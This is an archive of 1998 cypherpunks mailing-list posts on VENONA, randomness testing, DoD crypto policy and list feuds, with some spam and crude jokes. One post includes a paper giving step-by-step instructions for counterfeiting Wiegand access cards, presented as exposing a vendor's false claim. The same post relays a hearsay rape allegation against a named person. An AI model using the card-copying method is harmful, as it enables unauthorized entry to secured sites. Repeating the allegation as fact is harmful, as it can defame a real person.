Content-Type: text/plain


On Mon, 27 Jul 1998, Jim Gillogly wrote:

>Woops, cryptography relevance inadvertently embedded in a farrago by Attila:
>
>>     I always wanted to believe Alger Hiss was innocent as his son Tony 
>>     was in my class at Harvard --he wasnt innocent, nor were the Rosenbergs 
>>     as the CIA had cracked the code but would not show it in court --they 
>>     even knew who handed over the trigger mechanism (never punished and he 
>>     left the U.S. after the Manhattan project and taught for many years at 
>>     Oxford).
>
>For one thing, the CIA didn't crack the VENONA ciphers: it was the
>Signal Intelligence Service at Arlington Hall, a predecessor of the
>NSA, and NSA continued the cracks for the next three decades.
>
	you are absolutely correct --my gaffe. CIA has never worked code
	to my knowledge. in fact, the old man who was the lead
	mathematician on the Verona project just died, did he not?

>While the VENONA decrypts do indeed establish the Rosenbergs' guilt
>beyond reasonable doubt, the evidence about Alger Hiss is more
>tenuous.  The only relevant evidence released is a single decrypt at
>http://www.nsa.gov:8080/docs/venona/docs/Mar45/30_Mar_1945_R3_m4_p1.gif
>about an interview with a Communist agent code-named ALES.  A footnote
>says ALES is "Probably Alger Hiss".  The text of the message says that
>ALES was at the Yalta conference (Alger Hiss was in fact there) and
>went on to Moscow (I don't know whether Hiss did this or not, nor how
>many others of the rather large American team did so).
>
	I believe he went on to Moscow since he was one of FDR's two or
	three top people. I would need to reread the rather long paper
	on the various people involved and just how close McCarthy was
	to a truth he could not prove --didn't make McCarthy any less of a
	scumbag, though. I read the Alger Hiss portions of the documen-
	tation rather carefully because of the personal friendship I had
	with Tony who was a very genuine, refined individual (we were
  	on the Harvard Crimson editorial staff together). I will also
	check your reference on Verona, but I believe there is more in
	the open records which ties it down.

	what is interesting is the number of intelligent individuals who
	not only believe in the concept of socialism/communism, but were
	essentially apologists for Lenin, Trotsky, Stalin, etc. through
	the period 1917-1950. it was if the pain of Russia's people was
	just a catharsis on the road to Utopia --by 1950, the apologia 
	wore rather thin...

	the guilt of the man who passed the trigger from White Sands is
	confirmed beyond a doubt by Verona also.
>
>In any case, the identification is less than certain, and much less
>definitive than the Rosenberg data.
>
	granted, but with the outside information, sufficient I believe
	to raise more than an eyebrow and Alger Hiss certainly should not
	have been in the position of trust and power that he was. part of
	the evidence is based on process of elimination --if not Hiss,
	who was standing at FDR's side in incident or "give-up" time and
	time again?  with or without the McCarthy Red scare, I think the
	evidence was sufficient to convict, but then and again, I am known
	to be wrong --as above...

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Mon, 27 Jul 1998 18:26:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ACM CCCS '98: Anonymity on the Internet
Message-ID: <m0z0yMN-0003beC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


The ACM CCCS'98 conference (November 1998) has recently been announced
on cryptography@c2.net.

There will be a panel on "Anonymity on the Internet", moderated by
Paul Syverson.  There's also a paper discussing the attacks
nym.alias.net has had to face:

   David Mazires and M. Frans Kaashoek. The design, implementation and
   operation of an email pseudonym server. In Proceedings of the 5th ACM
   Conference on Computer and Communications Security, 1998.

ftp://cag.lcs.mit.edu/pub/dm/papers/mazieres:pnym.ps.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcts@globalvisionexpo.com
Date: Tue, 28 Jul 1998 03:51:03 -0700 (PDT)
To: wcts@globalvisionexpo.com
Subject: Your literature on our world tour
Message-ID: <199807281050.DAA16195@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From:  Charles H. Borden
President, GlobalVision
Sarasota, Florida


Please kindly direct to the Sales and Marketing Decision Maker

We are GlobalVision.  We'll generate export sales for you while you stay home.  Please accept a space for your firm's standard promotional literature on our upcoming World Tour of our exclusive 'Direct from the USA' catalog expos.  Your catalog or brochure will be professionally presented to qualified import buyers, distributors, agents, joint venture partners and government purchasing agents in the countries of your choice.  This tour includes commercial and World Trade Centers in Australia, Japan, S. Africa, Singapore, Spain, Mexico, Canada, Argentina, Colombia, Venezuela and Brazil. 

We have been featured in a Success Magazine cover story and are a "final five" recipient of the 1998 SBA/Chamber of Commerce 'Young Business of the Year' award.   We also have an excellent D&B rating of 3A1.

Fees range from just $375-$695 per expo with a money back guarantee.  Registration deadline is in 
2 1/2 weeks.  If you wish to have your products or services promoted in the world's best markets, while you stay home, please respond by E-mail today.  Simply hit your reply button and send us a short note.  Please be sure to include your NAME, COMPANY, AREA CODE and PHONE NUMBER.
Susan Khrystal, our V.P., will contact you by PHONE during business hours.

If you have received this message in error, please accept our apology.  If you wish to be excluded from future mailings, simply press your reply button and send us the word "remove" in the subject line.

Sincerely,

Charles Borden
President, GlobalVision







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samson <nobody@samson.ml.org>
Date: Tue, 28 Jul 1998 05:21:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Where's Toto?"
In-Reply-To: <v03130309b1e2d1c521fd@[209.133.20.23]>
Message-ID: <381410550f7263fa4eb10ed0cd923f34@samson.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Jul 1998 17:57:20 -0700  Tim May <tcmay@got.net> wrote:

> >Where's Toto?
>
> Toto has been bombing us for weeks. Or did you think "Linda Reed" is really
> a woman, rather than a small dog?

Shit!  There goes that fantasy!  For weeks I've dreamt about how kewl
it would be to fuck a female cypherpunk.

I guess I'll have to become a fed... at least I can fuck Jim Bell.


gurlmonger










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 28 Jul 1998 06:36:56 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: $200,000 pussy for sale/Double Ds make me sneeze
Message-ID: <19980728081100.25776.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/28/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 28 Jul 1998 07:20:52 -0700 (PDT)
To: sjmz@hplb.hpl.hp.com
Subject: Fisher's ORDER of July 22, 1998
Message-ID: <35BDDD11.4186@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 7/28/98 7:34 AM

John Young

Morales and I met for lunch yesterday.

We formulated our response to Fisher's ORDER of July 22, 1998.

We will get it out this week.

Wayland wants to meet this morning to talk BUSINESS.

I attach what I wrote for Wayland's and his Texas A&M buddies
SBIR proposal.

I am also working on the techie side of the digital FX.

I am getting 8051 machines working AGAIN.  

Thank goodness I wrote a book documenting what we did.

I have to study my own book to TRY TO figure out what is going
wrong!

Our phone conversation when you told me about some SCARY
people you met some years ago reminds me of Sandian James Gosler.

Sandia transferred me into Robert Ewing's division to break electronic
locks for the FBI.

Gosler was then made Ewing's projects boss.

It was at this time that Gosler told me that my abilities were being
wasted
breaking locks for the FBI.

Gosler told me he was going to transfer me to an NSA project.  

I refused.  

NSA requires signed one's civil liberties away to work on their
projects. http://www.jya.com/nsa-sun.htm

After I just met Bob Wayland, Wayland told me to keep away from Gosler.

Wayland told me - and others too - that one of Gosler's female employees
invited Gosler to her home after work.

Gosler raped her, I was told.

Gosler threatened to kill her if she revealed the rape, I was told.

My former department manager, Kent Parsons, and Forth advocate told me
that he thought that Gosler
was "one of Sandia's true crazies."

Gosler is the supervisor to told me

  When Payne balked, his supervisor said Payne "did not choose his jobs.
Rather, Sandia assigns     duties to"  him. http://www.jya.com/whp1.htm

What scares me is that guys like Gosler are working for our government.

Let's all hope for settlement before this matter gets WORSE.

Later
bill


         	WEED KILLER computer interface proposal section 7/27/98 10:11 AM

Solution to controlling and collecting data from the WEED KILLER involves interfacing a personal computer
running a version of the Windows operating system to the WEED KILLER analog/digital hardware.

Windows is not a real-time operating system, therefore  microcontroller controller/collector hardware 
interface must be installed between a Wintel PC and the WEED KILLER hardware.

Essence of the Wintel data collector problem is that Windows 3.x or 9x responds to a hardware interrupt
usually between 70 to 150 microseconds.  In rare occasions the interrupt latency may extend to 1.5 
milliseconds or even longer.  A microcontroller responds to an interrupt in several microseconds.

Wintel hardware controller interface is even more difficult than collection for the reason that the Windows 
operating system only gives control to an application when Windows decides.  In the collection, mode at
least a hardware interrupt signals Windows that the application wants control.  However, the microcontroller
can send the Wintel an interrupt asking the applications code whether there is any message it needs to
send the microcontroller.

Microcontrollers have specialized timers, serial expansion ports and are, therefore, designed to be interfaced to 
analog and digital hardware. 

An 80C32 family microcontroller is proposed for the WEED KILLER application for reasons.

1  The 80C32 will do the job.

2  Multiple vendors of 80C32 guarantee future supply at a competitive price.  Current suppliers include
 Intel, AMD, Winbond, Dallas, Philips, Siemens, OKI,  ATMEL, ... 

3  High-speed parallel port bi-directional IEEE 1284 enhanced capability port 9 (ecp) communications 
hardware between an 80C32 and PC is in the final stage of development.

4  IEEE 1284 hardware drivers are supplied with Windows NT.  Custom assembler dll drivers are available
for 9x and 3.x.

5  A public-domain Forth 8051 operating system hosting a high-level language and interactive assembler with 
complete source code documentation is available on Internet. http://jya.com/f86/whpf86.htm

Hardcover book further documenting 5 is available from Academic Press.
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Only a Wintel machine is required for both hardware and software for the WEED KILLER project.  

Usually a Forth hardware/software development probject on requres a voltmeter, logic probe, and, 
infrequently, an oscilloscope.  Reason  is the INTERACTIVE control of the hardware and software
from a PC keyboard and diagnostic information easily printed to a PC monitor.

Justification for assertion made in the above paragraph comes from Internet.

NASA uses Forth extensively for its space programs. http://groucho.gsfc.nasa.gov/forth/

Ballard used polyForth http://av.yahoo.com/bin/query?p=polyforth&z=2&hc=0&hs=0
to locate wrecks of the Titanic, Bismarck, and Yorktown.
http://www.nationalgeographic.com/features/98/midway

Sun Microsystems workstation boot into Forth then invokes Solaris. http://playground.sun.com/pub/1275/

Adobe Postscript is a version of Forth. 
http://www.mactech.com/articles/mactech/language/forth-postscript.html

Video game software are written mostly in Forth.

The Wintel side of the WEED KILLER project will be most-likely written in a small
amount of assembler interface code and Visual Basic.

While Forth threaded code software technology is extremely valuable in some settings,
it is not in others.

Java is a variation of Forth.  http://www.mrl.nyu.edu/meyer/jvmref/

Future of Java on Wintel machines is unclear at this time.

For example,

  The hottest items among techies is a browser called Opera.   
  This is a $40 shareware program that in speed and compact   
  size buts both IE and Communicator to shame.  It has a slightly   
  different interface from either of the majors - an interface some find    
  refreshing while other find less than useful.  As it's shareware, you can   
  try and then buy if you like it.  One reason for its speed is that it ignores   
  Java - the Internet's Bandwidth Pig (IBP).   
 
  The Rumor Mill by Paul Cassel
  ComputerScene Magazine  July 1998   
   
Forth executes code High-level at about 10% the speed of a compiled high-level
language.

Speed of execution of small applications is not effected by Forth's slow execution.

Reason is that initial code is written in high-level Forth.  

Inner loops are then translated into Forth assembler.

Speed is maintained with the advantage that data structures are created an maintained in
high-level language while the interactive operating system is retained for trouble shooting
both hardware and software problem.

Hardware cost of building the 80C32 the WEED KILLER boards is estimated at $10k.

Hardware design is estimated at 1 month labor at $50/hr for a total of $8k.

Software development on the 80C32 side in Forth and Forth assembler, software on the
Wintel side in Visual Basic and assembler, documentation, and training is estimated to
be 4 months for a total of $32k
   
 /\/\/\
end


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vox9869@aol.com
Date: Tue, 28 Jul 1998 06:21:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: window stickers
Message-ID: <8a1bc0a4.35bdd008@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for Lynrd Skynrds Freebird  on a window sticker for my car.  Do
you know where I can find one?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Tue, 28 Jul 1998 09:37:57 -0700 (PDT)
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <3.0.5.32.19980728093729.007deb30@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 7/28/98 +0100, Mok-Kong Shen wrote:
>David Honig wrote:
>
>> The output of a good block cipher in feedback mode will pass Diehard tests,
>> though it is not crypto-secure.
>
>I often see the phrase 'pass Diehard test' though I don't see from
>the documents of Diehard how to evaluate the volumenous printout
>of Diehard to say exactly whether the test is passed or not. Furthermore
>the component asc2bin.exe of Diehard is buggy.
>
>M. K. Shen
>

My rough understanding: the 'P' value is a measure on the hypothesis that
the test sample is a truly random sample, where truly random is defined by
the expected 
statistical properties being measured.  Eg in 100 bits you expect to find
50 1's; 
if you count 48, is your 100-bit sample consistant with it being
unpredictable?

If you get values near 1.0 your sample is not likely taken from a random pool.


Try this: generate 10Meg from a block cipher feeding back on itself.  Diehard
will pass these.  (Diehard needs 10M samples)

Now run FM hiss into your soundcard.  Sample this at 8Khz (to avoid
temporal correlation)
and save to a file til you have 10Meg.  Diehard will reject this.  Make a
larger
file, and then gzip it down to 10Meg.  (That it shrinks indicates its symbols
don't carry a full bit.)  Run Diehard on this.  It will pass more tests but
not all.


Take the FM hiss, feed it into a stream cipher, and start burning those OTPs.


Do this with a detuned *video* tuner for more bandwidth. 








honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 28 Jul 1998 01:41:06 -0700 (PDT)
To: David Honig <honig@m7.sprynet.com>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <35BD8E9A.799466A6@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:

> The output of a good block cipher in feedback mode will pass Diehard tests,
> though it is not crypto-secure.

I often see the phrase 'pass Diehard test' though I don't see from
the documents of Diehard how to evaluate the volumenous printout
of Diehard to say exactly whether the test is passed or not. Furthermore
the component asc2bin.exe of Diehard is buggy.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Jul 1998 10:10:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DoD on Infosec and Crypto
Message-ID: <199807281710.NAA25500@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


DoD released today a July 21 speech by John Hamre to a
gathering of Fortune 500 CIOs of which about half dealt
with infosec and encryption issues:

   http://jya.com/dod072198.htm  (53K)

Mentioned: the EFF DES crack, PGP, offshore products, 
the need for expensive hardware to bolster cheap code,
Eligible Receiver, the difficulty of DoD meshing its legacy
decrepit systems with cutting edge warfighting technology, 
concern about foreign Y2K, the need to slaughter when no 
one volunteers to help.

DoD boosts strong encryption as the primary means to
protect mil and com info but insists on "balancing"
the needs of privacy and law enforcement. Questioners
bluntly challenged equating the two.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 28 Jul 1998 11:56:38 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 28, 1998
Message-ID: <199807281818.NAA13019@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 28 Jul 1998 12:00:32 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: DoD on Infosec and Crypto
In-Reply-To: <199807281710.NAA25500@camel7.mindspring.com>
Message-ID: <199807281900.PAA03283@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199807281710.NAA25500@camel7.mindspring.com>, on 07/28/98 
   at 01:05 PM, John Young <jya@pipeline.com> said:

>DoD boosts strong encryption as the primary means to
>protect mil and com info but insists on "balancing"
>the needs of privacy and law enforcement. Questioners
>bluntly challenged equating the two.

You know I almost feel sorry for these guys. They *must* know that they
come off looking like complete fools with this line of "you need strong
crypto but not too strong that we can't snoop".

I did say *almost*. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Logic, not magic.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNb4hUI9Co1n+aLhhAQFG9AQAgB6okm0WN2Ws/t4DAiMf5mXcCmX9i7Oz
mJH7kSwReK0qmCAmnsv3MNP71VjdqZXiYD+mrTGIiiUP4+k8Br6oVBvuPl8DsFot
QcdxWjcGkLFDFPLUCFxV2WYbWju1RcClt2OlwKas/koKtTqUWtRmt2hznZdblC0w
XNjxeRFQEu0=
=esV/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Tue, 28 Jul 1998 11:19:21 -0700 (PDT)
To: Samson <nobody@samson.ml.org>
Subject: Re: "Where's Toto?"
In-Reply-To: <381410550f7263fa4eb10ed0cd923f34@samson.ml.org>
Message-ID: <Pine.BSF.3.96.980728180925.858A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



    y'al are missing the tornado: "Toto" is a small dog. rather
    territorial in fact. now, since I have literally made the 
    acquaintance of both "Toto" and his master/mistress, I shall 
    leave the reader to solve the exercise of "who is the master?"

    clue: it's not attila!

    clue: all truth can be found in "Alice in Wonderland"

	attila out...


On Tue, 28 Jul 1998, Samson wrote:

>On Mon, 27 Jul 1998 17:57:20 -0700  Tim May <tcmay@got.net> wrote:
>
>> >Where's Toto?
>>
>> Toto has been bombing us for weeks. Or did you think "Linda Reed" is really
>> a woman, rather than a small dog?
>
>Shit!  There goes that fantasy!  For weeks I've dreamt about how kewl
>it would be to fuck a female cypherpunk.
>
>I guess I'll have to become a fed... at least I can fuck Jim Bell.
>
>
>gurlmonger
>
>
>
>
>
>

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Tue, 28 Jul 1998 12:22:56 -0700 (PDT)
To: "S. M. Halloran" <mitch@duzen.com.tr>
Subject: Re: MItSchill Millhouse Holler'in
In-Reply-To: <199807281629.TAA25772@ankara.192.168.3.5>
Message-ID: <Pine.BSF.3.96.980728182712.858B-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Jul 1998, S. M. Halloran wrote:

    [smoke the balderdash]
>
>I really am enjoying this.  I had apparently a great deal of spare time in 
>the dog days of summer to humor the paranoids of the list although I was 
>rather dreading the consequences.
>
    	are you paranoid?  "dread" is a contributing factor to paranoia.

	dog days of summer --are you nuts? or just referring to Toto again?

>*** Object Lesson:  NEVER ARGUE WITH AN INSANE INDIVIDUAL ***
>
	yes, I see you are arguing with yourself. how do you look in
	the mirror?  have you found the Mad Hatter and the gerrymanderer?
	if the gerrymanderer cuts your "table" in two, which half will
	you be?

	you did not learn the most important lesson of the series: you
	must resort to the state of "crazy" to avoid going "insane".
	they give the insane Haldol if they are lucky, a lobotomy if
	that doesnt settle them down --witness Ken Kesey's "Cuckoo".

>1. You can never come to a compromise or even win:  it requires that the 
>two sides be possessed of reason, and you have only half of what you need.
>
	you got that one right! why dont you have _any_ reason for your
	intransigence?

	is it true you're several cards short of a full deck? and, there
	was some question as to your response to: "...and you said the
	last time you beat your wife was last Saturday?"

>2. There is a risk that you just might start believing what that 
>individual believes, especially when you start conceding small points that 
>appear to be the truth.  (Don't be fooled.)
>
	are you trying to imply that small lies are the foundation
	blocks of great truths?

	cowardly.  see Dorothy for counseling.

	great truths are built on small truths and fallacies are destroyed
 	with small lies that the little boy in Holland did not cover with
	his finger.

>3. It reduces you to a less dignified state before your peers.  And 
>appearance is everything.  Remember:  Style, not substance.  Form, not 
>structure.
>
	aaahh, I see you are the emporer with your new clothes!

>
>While in substance it is generally all the same, it still amazes
>the observer that one will find that smelling one's own is somehow less
>disgusting than smelling someone else's.   --Anonymous
>
    a disgusting comment which fits a research (bio)chemist in Turkey
    where birth control reminds me of:

   	the father of the bride, who was marrying a Turk, told her that
	she was not required to submit to the Turkish indecencies, and
	if her about to be husband told her to "roll over", she should
	refuse.

	everything was fine for about a year until one night the husband
	told her to "roll over" --she refused; and when questioned, she
	told him what her father had said. his reply was quite simple:
	"but you do wish to become pregnant, dont you?"

__________________________________________________________________________

    To be a ruler of men, you need at least 12 inches....

_________________________________________________________________ attila__






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. M. Halloran" <mitch@duzen.com.tr>
Date: Tue, 28 Jul 1998 09:49:22 -0700 (PDT)
To: attila <attila@hun.org>
Subject: Re: FDR
In-Reply-To: <199807271446.RAA18652@ankara.192.168.3.5>
Message-ID: <199807281533.SAA25475@ankara.192.168.3.5>
MIME-Version: 1.0
Content-Type: text/plain



Someone assuming the personality of attila about yesterday (who is he 
today? ask him--you might like the answer) wrote while in a mental state 
that could be characterized as perceiving reality for only the very 
briefest of moments:

[humongous snip of recycled rumors, shameless fabrications, hypocritical 
innuendo, outright slander, and maybe a paucity of conceded-by-all-
including-the-man-himself historical fact]

>     there is no left and right; there is no moral government; it's all
>     about power and staying in power.  ever notice how reformers only
>     stay reformers until they need to run for reelection and the money
>     goes to those who play ball?

So learn to play the game.  Yeah, no one, even the icons we build, is a 
born angel.  There are relative levels of the good and bad in our society. 
Do you see the word "relative"?  It means no absolutes.  If you want 
absolutes, check out the Bible readers for whom every word is sacred.  One 
of my rotating tag lines talks (another Turkish proverb) addresses the 
very issue you bring up:  power.  I hope it shows up at the end of this 
message.

> 
>     the U.S. is already an oligarchy, next comes the plutocracy, followed
>     by the triumvirate, and then the emporer (maybe with clothes) -then
>     there will be a winnowing and anarchy followed by tribal states. welcome
>     to history, but few will live to see it run its course --America, the
>     universally hated, will be the first to be plowed under when she can
>     no longer bully or buy the -pax americanus-. and the men in power know
>     that a hungry disorganized populace can be subjugated by a well fed
>     army.

Well, that's what we call human history.  Nations and empires rise and 
fall, birth and death, a natural progression.  The only thing you need 
worry about while living in this kennel called the planet Earth is to be 
top dog.

>     sorry, I really am crazy, but it's better to be crazy than insane.

You're sure about that, are you?


Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
Ankara   TURKEY
mitch@duzen.com.tr

A woman without a husband is like a horse without reins.   --Turkish proverb





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. M. Halloran" <mitch@duzen.com.tr>
Date: Tue, 28 Jul 1998 10:33:21 -0700 (PDT)
To: lreed@west.cscwc.pima.edu
Subject: Re: MItSchill Millhouse Holler'in
In-Reply-To: <009C9CD9.EB1F5DC0.23@west.cscwc.pima.edu>
Message-ID: <199807281629.TAA25772@ankara.192.168.3.5>
MIME-Version: 1.0
Content-Type: text/plain



Someone having looked over the shoulder of one Linda Reed--PCC West Campus 
CSC, getting her password, and then using her mail account, drooled with 
paralytic tongue as follos:

>   ReVisionIst, to me, indicates someone who takes another look
> at what was previously seen with the aid of colour-glossy photos
> and pie-charts provided by the people who threatened to imprison
> your parents if they failed to send you to government-sponsered
> IndoctrinationCamps justified under the ruse of FreeEducation,
> which sometimes seem mostly geared for reinforcing in our minds
> how lucky we are to live in a country where the government is
> kind enough to provide us with FreeIncomeTaxReturnForms.

What color are your glossy glasses, by the way?

In addition to "FreeIncomeTaxReturnForms", they also let me urinate in the 
national forests too.

>  
>   As far as Roosevelt, or anyone else, being "the greatest
> President" of any era, it would be more accurate to describe
> their being the GreatestBullShitter of the era, or of having
> the GreatestAdvertising/SpinDoctor/PoliticalThugs of the era.

Doesn't that count for something?  Be all you can be, right?  Excellence 
in being immoral is certainly better than being mediocre at being immoral.

>   It is a matter of speculation to what extent Roosevelt's 
> actions were responsible for the recovery of the American
> economy after the collapse of the banking sector, but it is 
> a matter of *fact*, supported by the testimony of even those
> who were part of FDR's political entourage, that Roosevelt
> took steps to ensure the *complete* collapse of America's
> financial institutions while Hoover was still President,
> in order to put himself in a position to extort as much
> money and power as possible out of Congress. 

Is this sort of like Reagan arranging with the Iranians that the Tehran 52 
could come home for Christmas, but not before?

And while having mentioned the cheese head, could you possibly do a piece 
on Reagan, by the way?  Now *that* is something I could enjoy reading.  
